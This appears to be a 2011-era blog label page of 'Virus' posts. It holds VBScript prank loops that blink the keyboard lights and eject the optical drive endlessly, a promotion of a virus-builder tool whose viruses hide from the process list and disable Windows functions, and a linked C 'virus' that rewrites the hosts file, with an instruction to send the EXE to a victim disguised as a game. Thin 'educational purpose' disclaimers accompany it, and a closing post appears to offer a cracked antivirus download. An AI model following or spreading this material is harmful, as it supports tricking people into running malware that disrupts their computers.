Showing posts with label Virus. Show all posts
Showing posts with label Virus. Show all posts

Make Your Keyboard Light Blink

Monday, August 15, 2011

Want to see your keyboard light blinking constantly like a disco??
If yes, this is for you.

1st open your notepad

just copy and paste the code written below:-

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 200
wshshell.sendkeys "{CAPSLOCK}"
wscript.sleep 100
wshshell.sendkeys "{NUMLOCK}"
wscript.sleep 50
wshshell.sendkeys "{SCROLLLOCK}"
loop


Now go to file then save as and then give any name you want with vbs extension.
means :- whatevername.vbs


Then it should create a vbs script file.
Double click on it.
Now see the keyboard lights(NUM lock,CAPS lock,SCROLL lock)
It starts blinking.

Here is a another script it blinks another style.
Do as above but now paste this code:-


Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop


save it as anyname.vbs like above
and double click the vbs filee to see the another style

NOTE:- To stop this go to task manager then processes and find wscript.exe
end that process. it stops blinking.

Open DVD or cd drive infinitely - fun with VBS script




We can do many funny things with VBS scripts and one of the most famous trick is ejecting a cd/dvd drive infinitely. In our previous posts we had given some of the best notepad tricks but not this type of funny(some what prank) vbs script. So lets see how to do it.
Step #1: Open up your notepad and copy paste the following code.

Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If
Step #2: Now name it as you wish with .vbs extection EX: openup.vbs
That’s it your done, to activate it just double click the file you just created. If you wish stop it open task manager by pressing ctrl+alt+del > click on process tab > find the process wscript.exe > highlight it and click End process

Create your own virus with JPS VIRUS MAKER 3.0

JPS VIRUS MAKER 3.0


JPS VIRUS MAKER 3.0
This is a nice tool for creating your own virus. Select all options you want with your virus and then click on create Virus. It will create an effective virus. There are many options which your your virus will do on victims computer system. Your virus will able to hide itself from process list and it will disable many windows functions.


But be sure not to run in your computer. 
This is only for educational purpose. Please do not use it to harm any other.

Download Here:

Create a virus to block websites

How to create a virus to block websites


Today i am going to write a post on a simple virus written in C. It will block websites on your computer system. This C code is only the implementation of my previous post How to block a website without any software 
I am implementing that process by a C program to create it as a virus. Once the virus is clicked, it will block the some specific websites on victim's computer. The website which you want to block is mentioned in the source code of the program. Change the list according to your choice.


Download source code of Virus Here:
http://www.ziddu.com/downloadlink/13612130/Virus.rar


How to use:

  • You need to have a C compiler for that.
  • Compile and build the C program and generate the EXE file.
  • Run the EXE on your computer to check it's working. 
  • Go to the browser and try to open google or facebook. ;)
  • to unblock those websites. try the procedure given in my older post How to block a website without any software and delete the new entries in the file hosts created by this virus.
  • Now send this EXE to the victim as a game or any other software.


THIS IS FOR EDUCATIONAL PURPOSE. PLEASE DO NOT USE THIS TO HARM ANYONE

McAfee VirusScan Enterprise 8.8 Full


McAfee VirusScan Enterprise 8.8 Multilingual Retail | 44 MB

McAfee® VirusScan® Enterprise is good protection of your desktop and file servers from a wide range of security threats, including viruses, worms, Trojan horses, zombies and potentially unwanted code and programs. This antivirus version takes anti-virus protection to the next level, integrating elements of intrusion prevention and firewall technology into a single solution for PCs and file servers.
This powerful combination delivers truly proactive protection from the newest of today’s threats-including buffer – overflow exploits and blended attacks – and features advanced outbreak management responses to reduce the damage and costs of outbreaks. Everything is managed by McAfee ePolicy Orchestrator® or ProtectionPilot™ for scalable security policy compliance and graphical reporting.

Features:
- Comprehensive McAfee anti-virus protection
- Potentially unwanted program security
- Buffer overflow prevention (IPS feature)
- Complete outbreak response
- Port blocking/lockdown (firewall feature)
- Application monitoring: email engines (firewall feature)
- File blocking, directory lockdown, folder/share blocking (IPS feature)


 
Support : Creating Website
Copyright © 2012. Your Unofficial Guide - All Rights Reserved
Proudly powered by Blogger